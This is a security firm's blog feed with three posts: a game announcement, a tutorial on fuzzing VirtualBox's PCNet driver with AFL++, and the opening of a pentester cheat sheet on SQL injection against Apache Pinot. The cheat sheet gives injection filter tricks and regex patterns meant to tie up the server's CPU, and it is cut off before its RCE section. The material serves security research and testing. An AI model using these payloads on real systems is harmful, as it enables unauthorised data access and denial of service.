Normal view

There are new articles available, click to refresh the page.
Before yesterdayDoyensec's Blog

H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Introduction to VirtualBox security research

25 April 2022 at 22:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the binary VirtualBox from the out/linux.amd64/debug/bin/VirtualBox directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing to selectively enable the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness, that we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VboxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

IMachineDebugger VM

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
        PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
        PVM pVM = pUVM->pVM;


        if (SUCCEEDED(hrc)) {

          PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
          PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

In the same file after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, append __AFL_FUZZ_INIT(); before defining the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data by using access I/O port instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, after some consideration for the implementing of our fuzzing framework, we discovered Fuzzed Data Provider (later FDP).

FDP is part of the LLVM and, after we pass it a buffer generated by AFL, it can leverage it to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using convenient macro PDMDEVINS_2_DATA. Likewise, we can extend the state structure (in our case PCNETSTATE) to include the FDP header file via a pointer to FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too :

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful and include them inside R3 only parts. The easiest way is to find the R3 constructor and add new code just after that, as it already has defined the IN_RING3 macro for the conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even when we can reach more than 10k executions per second, we still have some work to do about the stability.

Improving Stability

Unfortunately, none of these methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded, therefore partially disabling instrumentation was not possible nor was possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

Apache Pinot SQLi and RCE Cheat Sheet

8 June 2022 at 22:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

